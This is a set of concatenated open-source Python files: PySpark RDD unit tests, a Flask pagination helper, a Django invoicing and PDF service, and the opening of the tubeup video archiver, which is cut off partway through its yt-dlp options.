self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions_asc(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2, True)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_repartitionAndSortWithinPartitions_desc(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2, False)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(2, 6), (0, 5), (0, 8)])
self.assertEqual(partitions[1], [(3, 8), (3, 8), (1, 3)])
def test_repartition_no_skewed(self):
num_partitions = 20
a = self.sc.parallelize(range(int(1000)), 2)
l = a.repartition(num_partitions).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
l = a.coalesce(num_partitions, True).glom().map(len).collect()
zeros = len([x for x in l if x == 0])
self.assertTrue(zeros == 0)
def test_repartition_on_textfile(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello/hello.txt")
rdd = self.sc.textFile(path)
result = rdd.repartition(1).collect()
self.assertEqual(u"Hello World!", result[0])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 2000001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDeUtil.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('java').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('java', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
def test_pipe_unicode(self):
# Regression test for SPARK-20947
data = [u'\u6d4b\u8bd5', '1']
rdd = self.sc.parallelize(data)
result = rdd.pipe('cat').collect()
self.assertEqual(data, result)
def test_stopiteration_in_user_code(self):
def stopit(*x):
raise StopIteration()
seq_rdd = self.sc.parallelize(range(10))
keyed_rdd = self.sc.parallelize((x % 2, x) for x in range(10))
msg = "Caught StopIteration thrown from user's code; failing the task"
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.map(stopit).collect)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.filter(stopit).collect)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.foreach, stopit)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.reduce, stopit)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.fold, 0, stopit)
self.assertRaisesRegexp(Py4JJavaError, msg, seq_rdd.foreach, stopit)
self.assertRaisesRegexp(Py4JJavaError, msg,
seq_rdd.cartesian(seq_rdd).flatMap(stopit).collect)
# these methods call the user function both in the driver and in the executor
# the exception raised is different according to where the StopIteration happens
# RuntimeError is raised if in the driver
# Py4JJavaError is raised if in the executor (wraps the RuntimeError raised in the worker)
self.assertRaisesRegexp((Py4JJavaError, RuntimeError), msg,
keyed_rdd.reduceByKeyLocally, stopit)
self.assertRaisesRegexp((Py4JJavaError, RuntimeError), msg,
seq_rdd.aggregate, 0, stopit, lambda *x: 1)
self.assertRaisesRegexp((Py4JJavaError, RuntimeError), msg,
seq_rdd.aggregate, 0, lambda *x: 1, stopit)
def test_overwritten_global_func(self):
# Regression test for SPARK-27000
global global_func
self.assertEqual(self.sc.parallelize([1]).map(lambda _: global_func()).first(), "Hi")
global_func = lambda: "Yeah"
self.assertEqual(self.sc.parallelize([1]).map(lambda _: global_func()).first(), "Yeah")
def test_to_local_iterator_failure(self):
# SPARK-27548 toLocalIterator task failure not propagated to Python driver
def fail(_):
raise RuntimeError("local iterator error")
rdd = self.sc.range(10).map(fail)
with self.assertRaisesRegexp(Exception, "local iterator error"):
for _ in rdd.toLocalIterator():
pass
def test_to_local_iterator_collects_single_partition(self):
# Test that partitions are not computed until requested by iteration
def fail_last(x):
if x == 9:
raise RuntimeError("This should not be hit")
return x
rdd = self.sc.range(12, numSlices=4).map(fail_last)
it = rdd.toLocalIterator()
# Only consume first 4 elements from partitions 1 and 2, this should not collect the last
# partition which would trigger the error
for i in range(4):
self.assertEqual(i, next(it))
def test_resourceprofile(self):
rp_builder = ResourceProfileBuilder()
ereqs = ExecutorResourceRequests().cores(2).memory("6g").memoryOverhead("1g")
ereqs.pysparkMemory("2g").resource("gpu", 2, "testGpus", "nvidia.com")
treqs = TaskResourceRequests().cpus(2).resource("gpu", 2)
def assert_request_contents(exec_reqs, task_reqs):
self.assertEqual(len(exec_reqs), 5)
self.assertEqual(exec_reqs["cores"].amount, 2)
self.assertEqual(exec_reqs["memory"].amount, 6144)
self.assertEqual(exec_reqs["memoryOverhead"].amount, 1024)
self.assertEqual(exec_reqs["pyspark.memory"].amount, 2048)
self.assertEqual(exec_reqs["gpu"].amount, 2)
self.assertEqual(exec_reqs["gpu"].discoveryScript, "testGpus")
self.assertEqual(exec_reqs["gpu"].resourceName, "gpu")
self.assertEqual(exec_reqs["gpu"].vendor, "nvidia.com")
self.assertEqual(len(task_reqs), 2)
self.assertEqual(task_reqs["cpus"].amount, 2.0)
self.assertEqual(task_reqs["gpu"].amount, 2.0)
assert_request_contents(ereqs.requests, treqs.requests)
rp = rp_builder.require(ereqs).require(treqs).build
assert_request_contents(rp.executorResources, rp.taskResources)
rdd = self.sc.parallelize(range(10)).withResources(rp)
return_rp = rdd.getResourceProfile()
assert_request_contents(return_rp.executorResources, return_rp.taskResources)
rddWithoutRp = self.sc.parallelize(range(10))
self.assertEqual(rddWithoutRp.getResourceProfile(), None)
def test_multiple_group_jobs(self):
import threading
group_a = "job_ids_to_cancel"
group_b = "job_ids_to_run"
threads = []
thread_ids = range(4)
thread_ids_to_cancel = [i for i in thread_ids if i % 2 == 0]
thread_ids_to_run = [i for i in thread_ids if i % 2 != 0]
# A list which records whether job is cancelled.
        # The index of the array is the thread index in which the job runs.
is_job_cancelled = [False for _ in thread_ids]
def run_job(job_group, index):
"""
Executes a job with the group ``job_group``. Each job waits for 3 seconds
and then exits.
"""
try:
self.sc.parallelize([15]).map(lambda x: time.sleep(x)) \
.collectWithJobGroup(job_group, "test rdd collect with setting job group")
is_job_cancelled[index] = False
except Exception:
# Assume that exception means job cancellation.
is_job_cancelled[index] = True
# Test if job succeeded when not cancelled.
run_job(group_a, 0)
self.assertFalse(is_job_cancelled[0])
# Run jobs
for i in thread_ids_to_cancel:
t = threading.Thread(target=run_job, args=(group_a, i))
t.start()
threads.append(t)
for i in thread_ids_to_run:
t = threading.Thread(target=run_job, args=(group_b, i))
t.start()
threads.append(t)
# Wait to make sure all jobs are executed.
time.sleep(3)
# And then, cancel one job group.
self.sc.cancelJobGroup(group_a)
# Wait until all threads launching jobs are finished.
for t in threads:
t.join()
for i in thread_ids_to_cancel:
self.assertTrue(
is_job_cancelled[i],
"Thread {i}: Job in group A was not cancelled.".format(i=i))
for i in thread_ids_to_run:
self.assertFalse(
is_job_cancelled[i],
"Thread {i}: Job in group B did not succeeded.".format(i=i))
if __name__ == "__main__":
import unittest
from pyspark.tests.test_rdd import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| ConeyLiu/spark | python/pyspark/tests/test_rdd.py | Python | apache-2.0 | 37,267 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Flicket - copyright Paul Bourne: [email protected]
from flask import url_for
from application import app
class PaginatedAPIMixin(object):
@staticmethod
def to_collection_dict(query, page, per_page, endpoint, **kwargs):
resources = query.paginate(page, per_page, False)
data = {
'items': [item.to_dict() for item in resources.items],
'_meta': {
'page': page,
'per_page': per_page,
'total_pages': resources.pages,
'total_items': resources.total,
},
'_links': {
'self': app.config['base_url'] + url_for(endpoint, page=page, per_page=per_page, **kwargs),
'next': app.config['base_url'] + url_for(endpoint, page=page + 1, per_page=per_page,
**kwargs) if resources.has_next else None,
'prev': app.config['base_url'] + url_for(endpoint, page=page - 1, per_page=per_page,
**kwargs) if resources.has_prev else None,
},
}
return data
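# Illustrative sketch (added note, not from the original file): rough shape of
# the dict returned by to_collection_dict(), assuming a hypothetical 'tickets'
# endpoint with 25 matching rows and per_page=10:
#
#     {'items': [...],  # one item.to_dict() per row on this page
#      '_meta': {'page': 1, 'per_page': 10, 'total_pages': 3, 'total_items': 25},
#      '_links': {'self': '<base_url>/tickets?page=1&per_page=10',
#                 'next': '<base_url>/tickets?page=2&per_page=10',
#                 'prev': None}}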
| evereux/flicket | application/flicket_api/scripts/paginated_api.py | Python | mit | 1,203 |
# -*- encoding: utf-8 -*-
import io
from datetime import date
from decimal import Decimal
from django.apps import apps
from django.conf import settings
from django.core.files.base import ContentFile
from django.db import transaction
from reportlab.lib import colors
from reportlab.lib.pagesizes import A4
from reportlab import platypus
from finance.models import VatSettings
from report.pdf import MyReport, NumberedCanvas
from .models import (
Invoice,
InvoiceContact,
InvoiceError,
InvoiceLine,
InvoiceSettings,
TimeRecord,
)
def format_minutes(minutes):
"""Convert minutes into formatted hours and minutes.
e.g. assert '01:15' == format_minutes(75)
From:
http://stackoverflow.com/questions/20291883/converting-minutes-to-hhmm-format-in-python
"""
return '{:02d}:{:02d}'.format(*divmod(int(minutes), 60))
class InvoiceCreate(object):
""" Create invoices for outstanding time records """
def _add_time_records(self, user, invoice, time_records):
"""Add time records to a draft invoice."""
invoice_settings = InvoiceSettings.objects.settings()
vat_settings = VatSettings.objects.settings()
for tr in time_records:
contact = invoice.contact
invoice_contact = InvoiceContact.objects.get(contact=contact)
invoice_line = InvoiceLine(
user=user,
invoice=invoice,
line_number=invoice.get_next_line_number(),
product=invoice_settings.time_record_product,
quantity=tr.invoice_quantity,
price=invoice_contact.hourly_rate,
units='hours',
vat_code=vat_settings.standard_vat_code,
)
invoice_line.save()
# link time record to invoice line
tr.invoice_line = invoice_line
tr.save()
def _is_valid(self, contact, time_records, raise_exception=None):
result = []
# check the invoice settings are set-up
invoice_settings = InvoiceSettings.objects.settings()
if not invoice_settings.time_record_product:
result.append(
"Cannot create an invoice. The invoice settings need a "
"product selected to use for time records."
)
# check the VAT settings are set-up
VatSettings.objects.settings()
invoice_contact = InvoiceContact.objects.get(contact=contact)
if not invoice_contact.hourly_rate:
result.append(
"Cannot create invoice - no hourly rate for "
"'{}'".format(contact.slug)
)
#if not time_records.count():
# result.append("Cannot create invoice. There are no time records.")
for tr in time_records:
if not tr.is_complete:
result.append(
"Cannot create invoice. Time record '{}' does "
"not have a start date/time or end time.".format(tr)
)
break
if result and raise_exception:
raise InvoiceError(
', '.join(result)
)
else:
return result
def create(self, user, contact, iteration_end):
""" Create invoices from time records """
invoice = None
time_records = TimeRecord.objects.to_invoice(contact, iteration_end)
self._is_valid(contact, time_records, raise_exception=True)
with transaction.atomic():
if time_records.count():
next_number = Invoice.objects.next_number()
invoice = Invoice(
number=next_number,
invoice_date=date.today(),
contact=contact,
user=user,
)
invoice.save()
self._add_time_records(user, invoice, time_records)
return invoice
def draft(self, contact, iteration_end):
"""Return a queryset with time records selected to invoice"""
return TimeRecord.objects.to_invoice(contact, iteration_end)
def is_valid(self, contact, raise_exception=None):
iteration_end = date.today()
time_records = TimeRecord.objects.to_invoice(contact, iteration_end)
return self._is_valid(contact, time_records, raise_exception)
def refresh(self, user, invoice, iteration_end):
"""Add invoice lines to a previously created (draft) invoice."""
if not invoice.is_draft:
raise InvoiceError(
"Time records can only be added to a draft invoice."
)
time_records = TimeRecord.objects.to_invoice(
invoice.contact,
iteration_end,
)
self._is_valid(invoice.contact, time_records, raise_exception=True)
with transaction.atomic():
self._add_time_records(user, invoice, time_records)
return invoice
class InvoiceCreateBatch(object):
def create(self, user, iteration_end):
""" Create invoices from time records """
invoice_create = InvoiceCreate()
model = apps.get_model(settings.CONTACT_MODEL)
for contact in model.objects.all():
invoice_create.create(user, contact, iteration_end)
class InvoicePrint(MyReport):
"""
Write a PDF for an invoice which has already been created in the database.
"""
def _get_column_styles(self, column_widths):
# style - add vertical grid lines
style = []
for idx in range(len(column_widths) - 1):
style.append((
'LINEAFTER',
(idx, 0),
(idx, -1),
self.GRID_LINE_WIDTH,
colors.gray)
)
return style
def create_pdf(self, invoice, header_image):
self.is_valid(invoice, raise_exception=True)
# Create the document template
buff = io.BytesIO()
doc = platypus.SimpleDocTemplate(
buff,
title=invoice.description,
pagesize=A4
)
invoice_settings = InvoiceSettings.objects.settings()
vat_settings = VatSettings.objects.settings()
# Container for the 'Flowable' objects
elements = []
elements.append(
self._table_header(
invoice,
invoice_settings,
vat_settings,
header_image
)
)
elements.append(platypus.Spacer(1, 12))
elements.append(self._table_lines(invoice))
elements.append(self._table_totals(invoice))
for text in self._text_footer(invoice_settings.footer):
elements.append(self._para(text))
# write the document to disk
doc.build(elements, canvasmaker=NumberedCanvas)
pdf = buff.getvalue()
buff.close()
invoice_filename = '{}.pdf'.format(invoice.invoice_number)
invoice.pdf.save(invoice_filename, ContentFile(pdf))
return invoice_filename
def is_valid(self, invoice, raise_exception=None):
result = []
if not invoice.has_lines:
result.append(
"Invoice {} has no lines - cannot create "
"PDF".format(invoice.invoice_number)
)
if not invoice.is_draft:
result.append(
"Invoice {} is not a draft invoice - cannot "
"create a PDF".format(invoice.invoice_number)
)
is_credit = invoice.is_credit
for line in invoice.invoiceline_set.all():
if not line.is_credit == is_credit:
if is_credit:
result.append(
"All credit note lines must have a negative quantity."
)
else:
result.append(
"All invoice lines must have a positive quantity."
)
break
if result and raise_exception:
raise InvoiceError(
', '.join(result)
)
else:
return result
def _table_invoice_detail(self, invoice):
"""
Create a (mini) table containing the invoice date and number.
This is returned as a 'mini table' which is inserted into the main
header table to keep headings and data aligned.
"""
# invoice header
invoice_header_data = [
[
self._bold('Date'),
'%s' % invoice.invoice_date.strftime('%d/%m/%Y')
],
[
self._bold(invoice.description),
'%s' % invoice.invoice_number
],
]
return platypus.Table(
invoice_header_data,
colWidths=[70, 200],
style=[
#('GRID', (0, 0), (-1, -1), self.GRID_LINE_WIDTH, colors.grey),
('VALIGN', (0, 0), (-1, -1), 'TOP'),
('LEFTPADDING', (0, 0), (-1, -1), 0),
]
)
def _table_header(
self, invoice, invoice_settings, vat_settings, header_image):
"""
Create a table for the top section of the invoice (before the project
description and invoice detail)
"""
left = []
right = []
# left hand content
left.append(self._para(self._text_invoice_address(invoice)))
left.append(platypus.Spacer(1, 12))
left.append(self._table_invoice_detail(invoice))
# right hand content
if header_image:
right.append(self._image(header_image))
right.append(self._para(
self._text_our_address(invoice_settings.name_and_address)
))
right.append(self._bold(invoice_settings.phone_number))
if vat_settings.vat_number:
right.append(self._para(
self._text_our_vat_number(vat_settings.vat_number)
))
heading = [platypus.Paragraph(invoice.description, self.head_1)]
# If the invoice has a logo, then the layout is different
if header_image:
data = [
[
heading + left, # left
right, # right
],
]
else:
data = [
[
heading, # left (row one)
[], # right (row one)
],
[
left, # left (row two)
right, # right (row two)
],
]
return platypus.Table(
data,
colWidths=[300, 140],
style=[
('VALIGN', (0, 0), (-1, -1), 'TOP'),
('LEFTPADDING', (0, 0), (-1, -1), 0),
#('GRID', (0, 0), (-1, -1), self.GRID_LINE_WIDTH, colors.grey),
]
)
def _table_lines(self, invoice):
""" Create a table for the invoice lines """
# invoice line header
data = [[
None,
self._para('Description'),
'Net',
'%VAT',
'VAT',
'Gross',
]]
# lines
lines = self._get_invoice_lines(invoice)
# initial styles
style = [
#('BOX', (0, 0), (-1, -1), self.GRID_LINE_WIDTH, colors.gray),
('LINEABOVE', (0, 0), (-1, 0), self.GRID_LINE_WIDTH, colors.gray),
('VALIGN', (0, 0), (0, -1), 'TOP'),
('ALIGN', (2, 0), (-1, -1), 'RIGHT'),
]
# style - add horizontal grid lines
for idx, line in enumerate(lines):
row_number = line[0]
if not row_number:
style.append((
'LINEBELOW',
(0, idx),
(-1, idx),
self.GRID_LINE_WIDTH,
colors.gray)
)
# column widths
column_widths = [30, 220, 50, 40, 50, 50]
style = style + self._get_column_styles(column_widths)
# draw the table
return platypus.Table(
data + lines,
colWidths=column_widths,
repeatRows=1,
style=style,
)
def _table_totals(self, invoice):
""" Create a table for the invoice totals """
gross = invoice.gross
net = invoice.net
vat = invoice.gross - invoice.net
data = [[
self._bold('Totals'),
'%.2f' % net,
None,
'%.2f' % vat,
'%.2f' % gross,
]]
style = [
('ALIGN', (1, 0), (-1, -1), 'RIGHT'),
('LINEBELOW', (0, 0), (-1, 0), self.GRID_LINE_WIDTH, colors.gray),
('LINEABOVE', (0, 0), (-1, 0), 1, colors.black),
]
column_widths = [250, 50, 40, 50, 50]
style = style + self._get_column_styles(column_widths)
return platypus.Table(
data,
colWidths=column_widths,
style=style,
)
def _get_invoice_line_description(self, invoice_line):
result = []
if invoice_line.description:
result.append('{}'.format(invoice_line.description))
if invoice_line.has_time_record:
time_record = invoice_line.timerecord
if time_record.title:
result.append('{}'.format(time_record.title))
result.append('%s %s to %s' % (
time_record.date_started.strftime("%a %d %b %Y"),
time_record.start_time.strftime("from %H:%M"),
time_record.end_time.strftime("%H:%M"),
))
result.append('%.2f %s @ %s pounds' % (
invoice_line.quantity,
invoice_line.units,
invoice_line.price
))
return '<br />'.join(result)
def _get_invoice_lines(self, invoice):
data = []
ticket_pk = None
for line in invoice.invoiceline_set.all():
# ticket heading (do not repeat)
if line.has_time_record and ticket_pk != line.timerecord.ticket.pk:
ticket_pk = line.timerecord.ticket.pk
data.append([
None,
self._bold(line.timerecord.ticket.title),
None,
None,
None,
None,
])
data.append([
'%s' % line.line_number,
self._para(self._get_invoice_line_description(line)),
'%.2f' % line.net,
'{:g}'.format(self._round(line.vat_rate * Decimal('100'))),
'%.2f' % line.vat,
'%.2f' % (line.vat + line.net),
])
return data
def _text_footer(self, footer):
""" Build a list of text to go in the footer """
result = []
lines = footer.split('\n')
for text in lines:
result.append(text)
return tuple(result)
def _text_invoice_address(self, invoice):
""" Name and address of contact we are invoicing """
contact = invoice.contact
lines = []
lines += [contact.company_name] if contact.company_name else []
lines += [contact.address_1] if contact.address_1 else []
lines += [contact.address_2] if contact.address_2 else []
lines += [contact.address_3] if contact.address_3 else []
lines += [contact.town] if contact.town else []
lines += [contact.county] if contact.county else []
lines += [contact.postcode] if contact.postcode else []
lines += [contact.country] if contact.country else []
return '<br />'.join(lines)
def _text_our_address(self, name_and_address):
""" Company name and address """
lines = name_and_address.split('\n')
return '<br />'.join(lines)
def _text_our_vat_number(self, vat_number):
return '<b>VAT Number</b> {}'.format(vat_number)
| pkimber/invoice | invoice/service.py | Python | apache-2.0 | 16,089 |
import os
import sys
import re
import glob
import time
import json
import logging
import internetarchive
from internetarchive.config import parse_config_file
from datetime import datetime
from yt_dlp import YoutubeDL
from .utils import (sanitize_identifier, check_is_file_empty,
EMPTY_ANNOTATION_FILE)
from logging import getLogger
from urllib.parse import urlparse
from tubeup import __version__
DOWNLOAD_DIR_NAME = 'downloads'
class TubeUp(object):
def __init__(self,
verbose=False,
dir_path='~/.tubeup',
ia_config_path=None,
output_template=None):
"""
`tubeup` is a tool to archive YouTube by downloading the videos and
        uploading them back to archive.org.
:param verbose: A boolean, True means all loggings will be
printed out to stdout.
:param dir_path: A path to directory that will be used for
saving the downloaded resources. Default to
'~/.tubeup'.
:param ia_config_path: Path to an internetarchive config file, will
be used in uploading the file.
"""
self.dir_path = dir_path
self.verbose = verbose
self.ia_config_path = ia_config_path
self.logger = getLogger(__name__)
if output_template is None:
self.output_template = '%(id)s.%(ext)s'
else:
self.output_template = output_template
# Just print errors in quiet mode
if not self.verbose:
self.logger.setLevel(logging.ERROR)
@property
def dir_path(self):
return self._dir_path
@dir_path.setter
def dir_path(self, dir_path):
"""
Set a directory to be the saving directory for resources that have
been downloaded.
:param dir_path: Path to a directory that will be used to save the
                         videos; if it does not exist yet, the directory
will be created.
"""
extended_usr_dir_path = os.path.expanduser(dir_path)
# Create the directories.
os.makedirs(
os.path.join(extended_usr_dir_path, DOWNLOAD_DIR_NAME),
exist_ok=True)
self._dir_path = {
'root': extended_usr_dir_path,
'downloads': os.path.join(extended_usr_dir_path,
DOWNLOAD_DIR_NAME)
}
def get_resource_basenames(self, urls,
cookie_file=None, proxy_url=None,
ydl_username=None, ydl_password=None,
use_download_archive=False):
"""
Get resource basenames from an url.
:param urls: A list of urls that will be downloaded with
youtubedl.
:param cookie_file: A cookie file for YoutubeDL.
:param proxy_url: A proxy url for YoutubeDL.
:param ydl_username: Username that will be used to download the
resources with youtube_dl.
:param ydl_password: Password of the related username, will be used
to download the resources with youtube_dl.
:param use_download_archive: Record the video url to the download archive.
This will download only videos not listed in
the archive file. Record the IDs of all
downloaded videos in it.
:return: Set of videos basename that has been downloaded.
"""
downloaded_files_basename = set()
def ydl_progress_hook(d):
if d['status'] == 'downloading' and self.verbose:
if d.get('_total_bytes_str') is not None:
msg_template = ('%(_percent_str)s of %(_total_bytes_str)s '
'at %(_speed_str)s ETA %(_eta_str)s')
elif d.get('_total_bytes_estimate_str') is not None:
msg_template = ('%(_percent_str)s of '
'~%(_total_bytes_estimate_str)s at '
'%(_speed_str)s ETA %(_eta_str)s')
elif d.get('_downloaded_bytes_str') is not None:
if d.get('_elapsed_str'):
msg_template = ('%(_downloaded_bytes_str)s at '
'%(_speed_str)s (%(_elapsed_str)s)')
else:
msg_template = ('%(_downloaded_bytes_str)s '
'at %(_speed_str)s')
else:
                    msg_template = ('%(_percent_str)s at '
                                    '%(_speed_str)s ETA %(_eta_str)s')
process_msg = '\r[download] ' + (msg_template % d) + '\033[K'
sys.stdout.write(process_msg)
sys.stdout.flush()
if d['status'] == 'finished':
msg = 'Downloaded %s' % d['filename']
self.logger.debug(d)
self.logger.info(msg)
if self.verbose:
print('\n%s' % d)
print(msg)
if d['status'] == 'error':
# TODO: Complete the error message
msg = 'Error when downloading the video'
self.logger.error(msg)
if self.verbose:
print(msg)
ydl_opts = self.generate_ydl_options(ydl_progress_hook,
cookie_file, proxy_url,
ydl_username, ydl_password,
use_download_archive)
with YoutubeDL(ydl_opts) as ydl:
for url in urls:
# Get the info dict of the url, it also download the resources
# if necessary.
info_dict = ydl.extract_info(url)
downloaded_files_basename.update(
self.create_basenames_from_ydl_info_dict(ydl, info_dict)
)
self.logger.debug(
'Basenames obtained from url (%s): %s'
% (url, downloaded_files_basename))
return downloaded_files_basename
def create_basenames_from_ydl_info_dict(self, ydl, info_dict):
"""
Create basenames from YoutubeDL info_dict.
:param ydl: A `youtube_dl.YoutubeDL` instance.
:param info_dict: A ydl info_dict that will be used to create
the basenames.
:return: A set that contains basenames that created from
the `info_dict`.
"""
info_type = info_dict.get('_type', 'video')
self.logger.debug('Creating basenames from ydl info dict with type %s'
% info_type)
filenames = set()
if info_type == 'playlist':
# Iterate and get the filenames through the playlist
for video in info_dict['entries']:
filenames.add(ydl.prepare_filename(video))
else:
filenames.add(ydl.prepare_filename(info_dict))
basenames = set()
for filename in filenames:
filename_without_ext = os.path.splitext(filename)[0]
file_basename = re.sub(r'(\.f\d+)', '', filename_without_ext)
basenames.add(file_basename)
return basenames
def generate_ydl_options(self,
ydl_progress_hook,
cookie_file=None,
proxy_url=None,
ydl_username=None,
ydl_password=None,
use_download_archive=False,
ydl_output_template=None):
"""
Generate a dictionary that contains options that will be used
by youtube_dl.
:param ydl_progress_hook: A function that will be called during the
download process by youtube_dl.
:param proxy_url: A proxy url for YoutubeDL.
:param ydl_username: Username that will be used to download the
resources with youtube_dl.
:param ydl_password: Password of the related username, will be
used to download the resources with
youtube_dl.
:param use_download_archive: Record the video url to the download archive.
This will download only videos not listed in
the archive file. Record the IDs of all
downloaded videos in it.
:return: A dictionary that contains options that will
be used by youtube_dl.
"""
ydl_opts = {
'outtmpl': os.path.join(self.dir_path['downloads'],
self.output_template),
'restrictfilenames': True,
'quiet': not self.verbose,
'verbose': self.verbose,
'progress_with_newline': True,
'forcetitle': True,
'continuedl': True,
'retries': 9001,
'fragment_retries': 9001,
'forcejson': False,
'writeinfojson': True,
'writedescription': True,
'writethumbnail': True,
'writeannotations': True,
'writesubtitles': True,
'allsubtitles': True,
